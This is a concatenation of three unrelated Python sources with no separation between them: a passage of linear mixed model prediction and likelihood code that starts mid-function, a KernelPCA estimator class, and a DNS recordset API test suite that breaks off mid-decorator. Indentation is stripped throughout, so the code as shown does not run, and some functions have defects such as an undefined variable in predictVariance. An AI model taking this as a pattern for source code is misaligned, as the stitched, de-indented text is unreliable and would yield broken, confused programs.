if k < N: # low-rank part
# determine normalization factor
if delta is not None:
denom = (delta*scale)
else:
denom = ((1.0-h2)*scale)
UUG = self.G - SP.dot(self.U, UG)
UUyres = yres - SP.dot(self.U,Uyres)
weights += UUG.T.dot(UUyres)/(denom)
return weights
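# Equivalence sketch (illustrative; delta parameterization, scale=1.0): the
# direct dense form of the weights computed above is
#     w = G.T.dot(LA.inv(G.dot(G.T) + delta*NP.eye(N))).dot(y - X.dot(beta))
# getPosteriorWeights reproduces this using the precomputed
# eigendecomposition instead of an explicit N x N inverse.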
def setTestData(self,Xstar,K0star=None,K1star=None,G0star=None,G1star=None):
'''
set data for predicting
--------------------------------------------------------------------------
Input:
Xstar : [M,D] 2-dimensional array of covariates on the test set
G0star : [M,k0] array of random effects on the test set
G1star : [M,k1] array of random effects on the test set (optional)
K0star : [M,N] array, random effects covariance between test and training data (positive semi-definite)
K1star : [M,N] array, random effects covariance between test and training data (positive semi-definite)(optional)
where M is # of test cases, N is the # of training cases
--------------------------------------------------------------------------
'''
self.Xstar = Xstar
if G1star is None:
self.Gstar=G0star
else:
if self.a2 == 0.0:
logging.info("a2=0.0, only using G0")
self.Gstar = G0star
elif self.a2 == 1.0:
self.Gstar = G1star
logging.info("a2=1.0, only using G1")
else:
self.Gstar=SP.concatenate((SP.sqrt(1.0-self.a2) * G0star, SP.sqrt(self.a2) * G1star),1)
if K0star is not None:
if K1star is None:
self.Kstar = K0star
else:
self.Kstar = (1.0-self.a2)*K0star + self.a2*K1star
else:
self.Kstar = SP.dot(self.Gstar,self.G.T)
self.UKstar = SP.dot(self.U.T,self.Kstar.T)
if self.G is not None:
k = self.G.shape[1]
N = self.G.shape[0]
if k<N:
# see e.g. Equation 3.17 in Supplement of FaST LMM paper
self.UUKstar = self.Kstar.T - SP.dot(self.U, self.UKstar)
def setTestData2(self,Xstar,K0star=None,K1star=None):
'''
a version of setTestData that doesn't assume that Eigenvalue decomposition has been done.
'''
self.Xstar = Xstar
self.Gstar = None
if K1star is None:
self.Kstar = K0star
else:
self.Kstar = (1.0-self.a2)*K0star + self.a2*K1star
def predictMean(self, beta, h2=0.0, logdelta=None, delta=None, scale=1.0):
'''
mean prediction for the linear mixed model on unobserved data:
ystar = X*beta + Kstar * (h2*K + (1-h2)*I)^{-1} * (y-X*beta)
where Kstar is the train vs. test kernel
--------------------------------------------------------------------------
Input:
beta : weight vector for fixed effects
h2 : mixture weight between K and Identity (environmental noise)
logdelta : log(delta) allows to optionally parameterize in delta space
delta : delta allows to optionally parameterize in delta space
scale : Scale parameter that multiplies the Covariance matrix (default 1.0)
If SNPs are excluded, nLLeval must be called beforehand to re-calculate self.UW, self.UUW
--------------------------------------------------------------------------
Output:
ystar : [M] 1-dimensional array of predicted phenotype values
--------------------------------------------------------------------------
'''
M = self.Xstar.shape[0]
if (h2<0.0) or (h2>=1.0):
return SP.nan * SP.ones(M)
k=self.S.shape[0]
N=self.y.shape[0]
#D=self.UX.shape[1]
if logdelta is not None:
delta = SP.exp(logdelta)
#delta = (1-h2) / h2
if delta is not None:
Sd = (self.S+delta)*scale
else:
assert False, "not implemented (UKstar needs to be scaled by h2)"
Sd = (h2*self.S + (1.0-h2))*scale
if len(self.exclude_idx) > 0:
# cut out
num_exclude = len(self.exclude_idx)
# consider only excluded SNPs
Gstar_exclude = self.Gstar[:,self.exclude_idx]
#G_exclude = self.G[:,self.exclude_idx]
UKstar = self.UKstar - SP.dot(self.UW,Gstar_exclude.T)
if k<N:
UUKstar = self.UUKstar - SP.dot(self.UUW,Gstar_exclude.T)
else:
UKstar = self.UKstar
UUKstar = self.UUKstar
yfixed = SP.dot(self.Xstar,beta)
yres = self.y - SP.dot(self.X,beta)
Uyres = self.Uy - SP.dot(self.UX,beta)
Sdi = 1./Sd
yrandom = SP.dot(Sdi*UKstar.T,Uyres)
if k < N: # low-rank part
# determine normalization factor
if delta is not None:
denom = (delta*scale)
else:
denom = ((1.0-h2)*scale)
UUyres = yres - SP.dot(self.U,Uyres)
yrandom += SP.dot(UUKstar.T,UUyres)/denom
# proximal contamination (see Supplement Note 2: An Efficient Algorithm for Avoiding Proximal Contamination)
# available at: http://www.nature.com/nmeth/journal/v9/n6/extref/nmeth.2037-S1.pdf
# exclude SNPs from the RRM in the likelihood evaluation
if len(self.exclude_idx) > 0:
UWS = self.UW / NP.lib.stride_tricks.as_strided(Sd, (Sd.size,num_exclude), (Sd.itemsize,0))
assert UWS.shape == (k, num_exclude)
WW = NP.eye(num_exclude) - UWS.T.dot(self.UW)
WKstar = UWS.T.dot(UKstar)
Wyres = UWS.T.dot(Uyres)
assert WW.shape == (num_exclude, num_exclude)
assert WKstar.shape == (num_exclude, M)
assert Wyres.shape == (num_exclude,)
if (k<N):#low rank part
WW += self.UUW.T.dot(self.UUW)/denom
WKstar += self.UUW.T.dot(UUKstar)/denom
Wyres += self.UUW.T.dot(UUyres)/denom
#TODO: do cholesky, if fails do eigh
# compute inverse efficiently
[S_WW,U_WW] = LA.eigh(WW)
UWKstar = U_WW.T.dot(WKstar)
UWyres = U_WW.T.dot(Wyres)
assert UWKstar.shape == (num_exclude, M)
assert UWyres.shape == (num_exclude,)
# compute S_WW^{-1} * UWX
WKstar = UWKstar / NP.lib.stride_tricks.as_strided(S_WW, (S_WW.size,UWKstar.shape[1]), (S_WW.itemsize,0))
# compute S_WW^{-1} * UWy
Wyres = UWyres / S_WW
assert WKstar.shape == (num_exclude, M)
assert Wyres.shape == (num_exclude,)
# perform updates (instantiations for a and b in Equation (1.5) of Supplement)
yrandom += UWKstar.T.dot(Wyres)
ystar = yfixed + yrandom
return ystar
def predict_mean_and_variance(lmm, beta, sigma2, h2, Kstar_star):
assert 0 <= h2 and h2 <= 1, "By definition, h2 must be between 0 and 1 (inclusive)"
varg = h2 * sigma2
vare = (1.-h2) * sigma2
if lmm.G is not None:
K = np.dot(lmm.G,lmm.G.T) #!!!later this is very inefficient in memory and computation
else:
K = np.dot(np.dot(lmm.U,np.eye(len(lmm.U)) * lmm.S),lmm.U.T) #Re-compose the Eigen value decomposition #!!!later do this more efficiently
V = varg * K + vare * np.eye(len(K))
Vinv = LA.inv(V)
a = np.dot(varg * lmm.Kstar, Vinv)
y_star = np.dot(lmm.Xstar,beta) + np.dot(a, lmm.y-SP.dot(lmm.X,beta)) #!!!later shouldn't the 2nd dot be precomputed?
y_star = y_star.reshape(-1,1) #Make 2-d
var_star = (varg * Kstar_star +
vare * np.eye(len(Kstar_star)) -
np.dot(a,
(varg * lmm.Kstar.T)))
return y_star, var_star
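# Note: predict_mean_and_variance is the dense, direct counterpart of
# predictMean/predictVariance below: it recomposes the full kernel and
# explicitly inverts V = varg*K + vare*I, which is simple but cubic in N.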
def nLL(lmm, beta, sigma2, h2, y_actual):
from scipy.stats import multivariate_normal
y_star, var_star = predict_mean_and_variance(lmm, beta, sigma2, h2, lmm.Kstar_star)
var = multivariate_normal(mean=y_star.reshape(-1), cov=var_star)
return -np.log(var.pdf(y_actual.reshape(-1)))
def predictVariance(self, h2=0.0, logdelta = None, delta = None, sigma2 = 1.0, Kstar_star = None):
'''
variance prediction for the linear mixed model on unobserved data:
Var_star = sigma2 * (K(X*,X*) + delta*I - Kstar * (K + delta*I)^{-1} * Kstar^T)
--------------------------------------------------------------------------
Input:
h2 : mixture weight between K and Identity (environmental noise)
logdelta : log(delta) allows to optionally parameterize in delta space
delta : delta allows to optionally parameterize in delta space
sigma2 : sigma2 parameter that multiplies the Covariance matrix (default 1.0)
K_star_star : Kernel on test examples
If SNPs are excluded, nLLeval must be called beforehand to re-calculate self.UW, self.UUW
--------------------------------------------------------------------------
Output:
Cov_star : [M,M] 2-dimensional array covariance matrix
--------------------------------------------------------------------------
'''
#TODO: proximal contamination
#TODO: REML?
if (h2<0.0) or (h2>=1.0):
return SP.nan * SP.ones(M)
k = self.S.shape[0]
N = self.y.shape[0]
#D = self.UX.shape[1]
#print "k, N, D", k, N, D
if logdelta is not None:
delta = SP.exp(logdelta)
if delta is not None:
#Sd = (self.S+delta)*sigma2
Sd = (self.S+delta)
else:
#Sd = (h2*self.S + (1.0-h2))*sigma2
Sd = (h2*self.S + (1.0-h2))
assert False, "h2 code path not test. Please use delta or logdelta"
#delta = 1.0/h2-1.0 #right?
Sdi = 1./Sd
# part 1 from c-code
#TODO: handle h2 parameterization
#TODO: make more efficient (add_diag)
if Kstar_star is None:
N_test = self.Gstar.shape[0]
Kstar_star = SP.dot(self.Gstar, self.Gstar.T)
else:
Kstar_star = Kstar_star.copy()
N_test = Kstar_star.shape[0]
assert N_test == Kstar_star.shape[1]
part1 = Kstar_star
part1 += SP.eye(N_test)*delta
part1 *= sigma2
#print "part1", part1[0,0]
#print "delta", delta, "sigma2", sigma2
# part 2 from c-code
# (U1^T a)^T (S_1 + delta*I)^{-1} (U1^T a)
SUKstarTUkStar = SP.dot(Sdi*self.UKstar.T, self.UKstar)
#UXS = self.UKstar / NP.lib.stride_tricks.as_strided(Sd, (Sd.size,self.UKstar.shape[1]), (Sd.itemsize,0))
#NP.testing.assert_array_almost_equal(SUKstarTUkStar, SP.dot(UXS.T, self.UKstar), decimal=4)
SUKstarTUkStar *= sigma2
#print "UKstar[0,0]", self.UKstar[0,0]
#print "UKstarS[0,0]", UXS[0,0]
#print "SUK", SUKstarTUkStar[0,0]
# part 3&4 from c-code
if k < N: # low-rank part
# determine normalization factor
if delta is not None:
denom = (delta*sigma2)
else:
denom = ((1.0-h2)*sigma2)
# see Equation 3.17 in Supplement of FaST LMM paper:
# 1 / delta * (((I_n - U1U1^T)a)^T (I_n - U1U1^T)a), a=K(XS,X)
SUKstarTUkStar += SP.dot(self.UUKstar.T, self.UUKstar)/denom
# see Carl Rasmussen's book on GPs, Equation 2.24
# or Equation 5 in Lasso-LMM paper
Var_star = part1 - SUKstarTUkStar
return Var_star
def nLLeval_test(self, y_test, beta, h2=0.0, logdelta=None, delta=None, sigma2=1.0, Kstar_star=None, robust=False):
"""
compute out-of-sample log-likelihood
robust: boolean
If False (the default), eigenvalues are truncated at 1E-9, as in FastLMMC,
which may lead to numerically unstable solutions; if True, a more
conservative 1E-4 cutoff is used.
"""
assert y_test.ndim == 1, "y_test should have 1 dimension"
mu = self.predictMean(beta, h2=h2, logdelta=logdelta, delta=delta)
res = y_test - mu
sigma = self.predictVariance(h2=h2, logdelta=logdelta, delta=delta, sigma2=sigma2, Kstar_star=Kstar_star)
#TODO: benchmark, record speed difference
"""
# efficient computation of: (y - mu)^T sigma2^{-1} (y - mu)
# Solve the linear system x = (L L^T)^-1 res
try:
L = SP.linalg.cho_factor(sigma)
res_sig = SP.linalg.cho_solve(L, res)
logdetK = NP.linalg.slogdet(sigma)[1]
except Exception, detail:
print "Cholesky failed, using eigen-value decomposition!"
"""
[S_,U_] = LA.eigh(sigma)
if robust:
S_nonz=(S_>1E-4)
else:
S_nonz=(S_>1E-9)
assert sum(S_nonz) > 0, "Some eigenvalues should be nonzero"
S = S_[S_nonz]
U = U_[:, S_nonz]
Sdi = 1 / S
res_sig = res.T.dot(Sdi * U).dot(U.T)
logdetK = SP.log(S).sum()
# some sanity checks
if False:
res_sig3 = SP.linalg.pinv(sigma).dot(res)
NP.testing.assert_array_almost_equal(res_sig, res_sig3, decimal=2)
# see Carl Rasmussen's book on GPs, equation 5.10
term1 = -0.5 * logdetK
term2 = -0.5 * SP.dot(res_sig.reshape(-1).T, res.reshape(-1)) #Change the inputs to the functions so that these are vectors, not 1xn,nx1
term3 = -0.5 * len(res) * SP.log(2 * SP.pi)
if term2 < -10000:
logging.warning("looks like nLLeval_test is running into numerical difficulties")
SC = S.copy()
SC.sort()
logging.warning(["delta:", delta, "log det", logdetK, "term 2", term2, "term 3:", term3 ])
logging.warning(["largest eigv:", SC[-1], "second largest eigv:", SC[-2], "smallest eigv:", SC[0] ])
logging.warning(["ratio 1large/2large:", SC[-1]/SC[-2], "ratio lrg/small:", SC[-1]/SC[0] ])
neg_log_likelihood = -(term1 + term2 + term3)
return neg_log_likelihood
# ---------------------------------------------------------------------------
"""Kernel Principal Components Analysis"""
# Author: Mathieu Blondel <mathieu@mblondel.org>
# License: BSD 3 clause
import numpy as np
from scipy import linalg
from ..utils import check_random_state
from ..utils.arpack import eigsh
from ..utils.validation import check_is_fitted
from ..exceptions import NotFittedError
from ..base import BaseEstimator, TransformerMixin
from ..preprocessing import KernelCenterer
from ..metrics.pairwise import pairwise_kernels
class KernelPCA(BaseEstimator, TransformerMixin):
"""Kernel Principal component analysis (KPCA)
Non-linear dimensionality reduction through the use of kernels (see
:ref:`metrics`).
Read more in the :ref:`User Guide <kernel_PCA>`.
Parameters
----------
n_components: int or None
Number of components. If None, all non-zero components are kept.
kernel: "linear" | "poly" | "rbf" | "sigmoid" | "cosine" | "precomputed"
Kernel.
Default: "linear"
degree : int, default=3
Degree for poly kernels. Ignored by other kernels.
gamma : float, optional
Kernel coefficient for rbf and poly kernels. Default: 1/n_features.
Ignored by other kernels.
coef0 : float, optional
Independent term in poly and sigmoid kernels.
Ignored by other kernels.
kernel_params : mapping of string to any, optional
Parameters (keyword arguments) and values for kernel passed as
callable object. Ignored by other kernels.
alpha: float
Hyperparameter of the ridge regression that learns the
inverse transform (when fit_inverse_transform=True).
Default: 1.0
fit_inverse_transform: bool
Learn the inverse transform for non-precomputed kernels.
(i.e. learn to find the pre-image of a point)
Default: False
eigen_solver: string ['auto'|'dense'|'arpack']
Select eigensolver to use. If n_components is much less than
the number of training samples, arpack may be more efficient
than the dense eigensolver.
tol: float
convergence tolerance for arpack.
Default: 0 (optimal value will be chosen by arpack)
max_iter : int
maximum number of iterations for arpack
Default: None (optimal value will be chosen by arpack)
remove_zero_eig : boolean, default=False
If True, then all components with zero eigenvalues are removed, so
that the number of components in the output may be < n_components
(and sometimes even zero due to numerical instability).
When n_components is None, this parameter is ignored and components
with zero eigenvalues are removed regardless.
random_state : int seed, RandomState instance, or None, default : None
A pseudo random number generator used for the initialization of the
residuals when eigen_solver == 'arpack'.
n_jobs : int, optional (default = 1)
The number of parallel jobs to run.
If ``-1``, then the number of jobs is set to the number of CPU cores.
Attributes
----------
lambdas_ :
Eigenvalues of the centered kernel matrix
alphas_ :
Eigenvectors of the centered kernel matrix
dual_coef_ :
Inverse transform matrix
X_transformed_fit_ :
Projection of the fitted data on the kernel principal components
References
----------
Kernel PCA was introduced in:
Bernhard Schoelkopf, Alexander J. Smola,
and Klaus-Robert Mueller. 1999. Kernel principal
component analysis. In Advances in kernel methods,
MIT Press, Cambridge, MA, USA 327-352.
"""
def __init__(self, n_components=None, kernel="linear",
gamma=None, degree=3, coef0=1, kernel_params=None,
alpha=1.0, fit_inverse_transform=False, eigen_solver='auto',
tol=0, max_iter=None, remove_zero_eig=False,
random_state=None, n_jobs=1):
if fit_inverse_transform and kernel == 'precomputed':
raise ValueError(
"Cannot fit_inverse_transform with a precomputed kernel.")
self.n_components = n_components
self.kernel = kernel
self.kernel_params = kernel_params
self.gamma = gamma
self.degree = degree
self.coef0 = coef0
self.alpha = alpha
self.fit_inverse_transform = fit_inverse_transform
self.eigen_solver = eigen_solver
self.remove_zero_eig = remove_zero_eig
self.tol = tol
self.max_iter = max_iter
self._centerer = KernelCenterer()
self.random_state = random_state
self.n_jobs = n_jobs
@property
def _pairwise(self):
return self.kernel == "precomputed"
def _get_kernel(self, X, Y=None):
if callable(self.kernel):
params = self.kernel_params or {}
else:
params = {"gamma": self.gamma,
"degree": self.degree,
"coef0": self.coef0}
return pairwise_kernels(X, Y, metric=self.kernel,
filter_params=True, n_jobs=self.n_jobs,
**params)
def _fit_transform(self, K):
""" Fit's using kernel K"""
# center kernel
K = self._centerer.fit_transform(K)
if self.n_components is None:
n_components = K.shape[0]
else:
n_components = min(K.shape[0], self.n_components)
# compute eigenvectors
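        # A note on the 'auto' heuristic below: the iterative ARPACK solver
        # only pays off when a small number of components is extracted from
        # a large kernel matrix; otherwise a dense solve is faster.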
if self.eigen_solver == 'auto':
if K.shape[0] > 200 and n_components < 10:
eigen_solver = 'arpack'
else:
eigen_solver = 'dense'
else:
eigen_solver = self.eigen_solver
if eigen_solver == 'dense':
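            # scipy's eigh returns eigenvalues in ascending order; the
            # ``eigvals`` range selects only the top n_components of them.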
self.lambdas_, self.alphas_ = linalg.eigh(
K, eigvals=(K.shape[0] - n_components, K.shape[0] - 1))
elif eigen_solver == 'arpack':
random_state = check_random_state(self.random_state)
# initialize with [-1,1] as in ARPACK
v0 = random_state.uniform(-1, 1, K.shape[0])
self.lambdas_, self.alphas_ = eigsh(K, n_components,
which="LA",
tol=self.tol,
maxiter=self.max_iter,
v0=v0)
# sort eigenvectors in descending order
indices = self.lambdas_.argsort()[::-1]
self.lambdas_ = self.lambdas_[indices]
self.alphas_ = self.alphas_[:, indices]
# remove eigenvectors with a zero eigenvalue
if self.remove_zero_eig or self.n_components is None:
self.alphas_ = self.alphas_[:, self.lambdas_ > 0]
self.lambdas_ = self.lambdas_[self.lambdas_ > 0]
return K
def _fit_inverse_transform(self, X_transformed, X):
if hasattr(X, "tocsr"):
raise NotImplementedError("Inverse transform not implemented for "
"sparse matrices!")
n_samples = X_transformed.shape[0]
K = self._get_kernel(X_transformed)
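        # Ridge-regularize the kernel: adding alpha to the diagonal is
        # equivalent to solving (K + alpha * I) dual_coef_ = X.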
K.flat[::n_samples + 1] += self.alpha
self.dual_coef_ = linalg.solve(K, X, sym_pos=True, overwrite_a=True)
self.X_transformed_fit_ = X_transformed
def fit(self, X, y=None):
"""Fit the model from data in X.
Parameters
----------
        X : array-like, shape (n_samples, n_features)
            Training vector, where n_samples is the number of samples
            and n_features is the number of features.
Returns
-------
self : object
Returns the instance itself.
"""
K = self._get_kernel(X)
self._fit_transform(K)
if self.fit_inverse_transform:
sqrt_lambdas = np.diag(np.sqrt(self.lambdas_))
X_transformed = np.dot(self.alphas_, sqrt_lambdas)
self._fit_inverse_transform(X_transformed, X)
self.X_fit_ = X
return self
def fit_transform(self, X, y=None, **params):
"""Fit the model from data in X and transform X.
Parameters
----------
        X : array-like, shape (n_samples, n_features)
            Training vector, where n_samples is the number of samples
            and n_features is the number of features.
Returns
-------
        X_new : array-like, shape (n_samples, n_components)
"""
self.fit(X, **params)
X_transformed = self.alphas_ * np.sqrt(self.lambdas_)
if self.fit_inverse_transform:
self._fit_inverse_transform(X_transformed, X)
return X_transformed
def transform(self, X):
"""Transform X.
Parameters
----------
        X : array-like, shape (n_samples, n_features)
        Returns
        -------
        X_new : array-like, shape (n_samples, n_components)
"""
check_is_fitted(self, 'X_fit_')
K = self._centerer.transform(self._get_kernel(X, self.X_fit_))
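        # Scale the projections by 1 / sqrt(lambda) so transform(X_fit_)
        # reproduces fit_transform's output (alphas_ * sqrt(lambdas_)).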
return np.dot(K, self.alphas_ / np.sqrt(self.lambdas_))
def inverse_transform(self, X):
"""Transform X back to original space.
Parameters
----------
        X : array-like, shape (n_samples, n_components)
        Returns
        -------
        X_new : array-like, shape (n_samples, n_features)
References
----------
"Learning to Find Pre-Images", G BakIr et al, 2004.
"""
if not self.fit_inverse_transform:
raise NotFittedError("The fit_inverse_transform parameter was not"
" set to True when instantiating and hence "
"the inverse transform is not available.")
K = self._get_kernel(X, self.X_transformed_fit_)
return np.dot(K, self.dual_coef_)
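# A minimal usage sketch (illustrative addition, not part of the original
# module; assumes the class is importable as sklearn.decomposition.KernelPCA):
#
#     import numpy as np
#     from sklearn.decomposition import KernelPCA
#
#     X = np.random.RandomState(0).randn(100, 5)
#     kpca = KernelPCA(n_components=2, kernel='rbf', gamma=0.5,
#                      fit_inverse_transform=True)
#     X_2d = kpca.fit_transform(X)            # shape (100, 2)
#     X_back = kpca.inverse_transform(X_2d)   # approximate pre-images, (100, 5)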
# Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Author: Kiall Mac Innes <kiall@managedit.ie>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
from mock import patch
import oslo_messaging as messaging
from oslo_log import log as logging
from designate import exceptions
from designate.central import service as central_service
from designate.tests.test_api.test_v2 import ApiV2TestCase
LOG = logging.getLogger(__name__)
class ApiV2RecordSetsTest(ApiV2TestCase):
def setUp(self):
super(ApiV2RecordSetsTest, self).setUp()
# Create a domain
self.domain = self.create_domain()
def test_create_recordset(self):
# Prepare a RecordSet fixture
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
response = self.client.post_json(
'/zones/%s/recordsets' % self.domain['id'], fixture)
# Check the headers are what we expect
self.assertEqual(201, response.status_int)
self.assertEqual('application/json', response.content_type)
# Check the body structure is what we expect
self.assertIn('links', response.json)
self.assertIn('self', response.json['links'])
# Check the values returned are what we expect
self.assertIn('id', response.json)
self.assertIn('created_at', response.json)
self.assertIsNone(response.json['updated_at'])
self.assertIn('records', response.json)
# The action and status are NONE and ACTIVE as there are no records
self.assertEqual('NONE', response.json['action'])
self.assertEqual('ACTIVE', response.json['status'])
def test_create_recordset_with_records(self):
# Prepare a RecordSet fixture
fixture = self.get_recordset_fixture(
self.domain['name'], 'A', fixture=0, values={'records': [
'192.0.2.1',
'192.0.2.2',
]}
)
response = self.client.post_json(
'/zones/%s/recordsets' % self.domain['id'], fixture)
# Check the headers are what we expect
self.assertEqual(202, response.status_int)
self.assertEqual('application/json', response.content_type)
# Check the values returned are what we expect
self.assertIn('records', response.json)
self.assertEqual(2, len(response.json['records']))
self.assertEqual('CREATE', response.json['action'])
self.assertEqual('PENDING', response.json['status'])
# Check the zone's status is as expected
response = self.client.get('/zones/%s' % self.domain['id'],
headers=[('Accept', 'application/json')])
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertEqual('UPDATE', response.json['action'])
self.assertEqual('PENDING', response.json['status'])
def test_create_recordset_with_invalid_name(self):
# Prepare a RecordSet fixture
body = self.get_recordset_fixture(
self.domain['name'],
'A',
fixture=0,
values={
'name': '`invalid`label`.%s' % self.domain['name'],
'records': [
'192.0.2.1',
'192.0.2.2',
]
}
)
url = '/zones/%s/recordsets' % self.domain['id']
# Ensure it fails with a 400
self._assert_exception(
'invalid_object', 400, self.client.post_json, url, body)
def test_create_recordset_with_name_too_long(self):
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
fixture['name'] = 'x' * 255 + ".%s" % self.domain['name']
body = fixture
url = '/zones/%s/recordsets' % self.domain['id']
self._assert_exception(
'invalid_object', 400, self.client.post_json, url, body)
def test_create_recordset_with_name_missing(self):
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
del fixture['name']
body = fixture
url = '/zones/%s/recordsets' % self.domain['id']
self._assert_exception(
'invalid_object', 400, self.client.post_json, url, body)
def test_create_recordset_type_is_missing(self):
# Prepare a RecordSet fixture
body = self.get_recordset_fixture(
self.domain['name'],
'A',
fixture=0,
values={
'name': 'name.%s' % self.domain['name'],
'records': [
'192.0.2.1',
'192.0.2.2',
]
}
)
del body['type']
url = '/zones/%s/recordsets' % self.domain['id']
# Ensure it fails with a 400
self._assert_exception(
'invalid_object', 400, self.client.post_json, url, body)
def test_create_recordset_with_invalid_type(self):
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
fixture['type'] = "ABC"
body = fixture
url = '/zones/%s/recordsets' % self.domain['id']
self._assert_exception(
'invalid_object', 400, self.client.post_json, url, body)
def test_create_recordset_description_too_long(self):
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
fixture['description'] = "x" * 161
body = fixture
url = '/zones/%s/recordsets' % self.domain['id']
self._assert_exception(
'invalid_object', 400, self.client.post_json, url, body)
def test_create_recordset_with_negative_ttl(self):
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
fixture['ttl'] = -1
body = fixture
url = '/zones/%s/recordsets' % self.domain['id']
self._assert_exception(
'invalid_object', 400, self.client.post_json, url, body)
def test_create_recordset_with_zero_ttl(self):
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
fixture['ttl'] = 0
body = fixture
url = '/zones/%s/recordsets' % self.domain['id']
self._assert_exception(
'invalid_object', 400, self.client.post_json, url, body)
def test_create_recordset_with_ttl_greater_than_max(self):
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
fixture['ttl'] = 2147483648
body = fixture
url = '/zones/%s/recordsets' % self.domain['id']
self._assert_exception(
'invalid_object', 400, self.client.post_json, url, body)
def test_create_recordset_with_invalid_ttl(self):
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
fixture['ttl'] = ">?!?"
body = fixture
url = '/zones/%s/recordsets' % self.domain['id']
self._assert_exception(
'invalid_object', 400, self.client.post_json, url, body)
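    # NOTE: the invalid-field tests above share one shape; a hypothetical
    # helper (illustrative sketch only, not part of the original suite)
    # could collapse them:
    #
    #     def _assert_create_fails(self, **overrides):
    #         fixture = self.get_recordset_fixture(
    #             self.domain['name'], fixture=0)
    #         fixture.update(overrides)
    #         url = '/zones/%s/recordsets' % self.domain['id']
    #         self._assert_exception(
    #             'invalid_object', 400, self.client.post_json, url, fixture)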
def test_create_recordset_invalid_id(self):
self._assert_invalid_uuid(self.client.post, '/zones/%s/recordsets')
def test_create_recordset_validation(self):
        # NOTE: The schemas should be tested separately from the API, so we
        # don't need to test every variation via the API itself.
# Fetch a fixture
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
url = '/zones/%s/recordsets' % self.domain['id']
# Add a junk field to the body
fixture['junk'] = 'Junk Field'
body = fixture
# Ensure it fails with a 400
self._assert_exception(
'invalid_object', 400, self.client.post_json, url, body)
@patch.object(central_service.Service, 'create_recordset',
side_effect=messaging.MessagingTimeout())
def test_create_recordset_timeout(self, _):
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
body = fixture
url = '/zones/%s/recordsets' % self.domain['id']
self._assert_exception('timeout', 504, self.client.post_json, url,
body)
@patch.object(central_service.Service, 'create_recordset',
side_effect=exceptions.DuplicateRecordSet())
def test_create_recordset_duplicate(self, _):
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
body = fixture
url = '/zones/%s/recordsets' % self.domain['id']
self._assert_exception('duplicate_recordset', 409,
self.client.post_json, url, body)
def test_create_recordset_invalid_domain(self):
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
body = fixture
url = '/zones/ba751950-6193-11e3-949a-0800200c9a66/recordsets'
self._assert_exception('domain_not_found', 404, self.client.post_json,
url, body)
def test_recordsets_invalid_url(self):
url = '/zones/recordsets'
self._assert_exception('not_found', 404, self.client.get, url)
self._assert_exception('not_found', 404, self.client.post_json, url)
        # Pecan returns a 405 for PATCH and DELETE operations
response = self.client.patch_json(url, status=405)
self.assertEqual(405, response.status_int)
response = self.client.delete(url, status=405)
self.assertEqual(405, response.status_int)
def test_get_recordsets(self):
url = '/zones/%s/recordsets' % self.domain['id']
response = self.client.get(url)
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
# Check the body structure is what we expect
self.assertIn('recordsets', response.json)
self.assertIn('links', response.json)
self.assertIn('self', response.json['links'])
# We should start with 2 pending recordsets for SOA & NS
# pending because pool manager is not active
self.assertEqual(2, len(response.json['recordsets']))
for recordset in response.json['recordsets']:
self.assertEqual('CREATE', recordset['action'])
self.assertEqual('PENDING', recordset['status'])
soa = self.central_service.find_recordset(
self.admin_context, criterion={'domain_id': self.domain['id'],
'type': 'SOA'})
ns = self.central_service.find_recordset(
self.admin_context, criterion={'domain_id': self.domain['id'],
'type': 'NS'})
data = [self.create_recordset(self.domain,
name='x-%s.%s' % (i, self.domain['name']))
for i in range(0, 10)]
data.insert(0, ns)
data.insert(0, soa)
self._assert_paging(data, url, key='recordsets')
self._assert_invalid_paging(data, url, key='recordsets')
def test_get_recordsets_filter(self):
# Add recordsets for testing
fixtures = [
self.get_recordset_fixture(
self.domain['name'], 'A', fixture=0, values={
'records': ['192.0.2.1', '192.0.2.2'],
'description': 'Tester1',
'ttl': 3600
}
),
self.get_recordset_fixture(
self.domain['name'], 'A', fixture=1, values={
'records': ['192.0.2.1'],
'description': 'Tester2',
'ttl': 4000
}
)
]
for fixture in fixtures:
response = self.client.post_json(
'/zones/%s/recordsets' % self.domain['id'],
fixture)
get_urls = [
# Filter by Name
'/zones/%s/recordsets?name=%s' % (
self.domain['id'], fixtures[0]['name']),
'/zones/%s/recordsets?data=192.0.2.1&name=%s' % (
self.domain['id'], fixtures[1]['name']),
# Filter by Type
'/zones/%s/recordsets?type=A' % self.domain['id'],
'/zones/%s/recordsets?type=A&name=%s' % (
self.domain['id'], fixtures[0]['name']),
# Filter by TTL
'/zones/%s/recordsets?ttl=3600' % self.domain['id'],
# Filter by Data
'/zones/%s/recordsets?data=192.0.2.1' % self.domain['id'],
'/zones/%s/recordsets?data=192.0.2.2' % self.domain['id'],
# Filter by Description
'/zones/%s/recordsets?description=Tester1' % self.domain['id']
]
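        # One expected match count per URL above: e.g. the bare type=A filter
        # matches both fixtures (2), while the name-qualified filters and the
        # ttl/description filters each match a single recordset.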
correct_results = [1, 1, 2, 1, 1, 2, 1, 1]
for get_url, correct_result in \
six.moves.zip(get_urls, correct_results):
response = self.client.get(get_url)
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
# Check that the correct number of recordsets match
self.assertEqual(correct_result, len(response.json['recordsets']))
def test_get_recordsets_invalid_id(self):
self._assert_invalid_uuid(self.client.get, '/zones/%s/recordsets')
@patch.object(central_service.Service, 'get_domain',
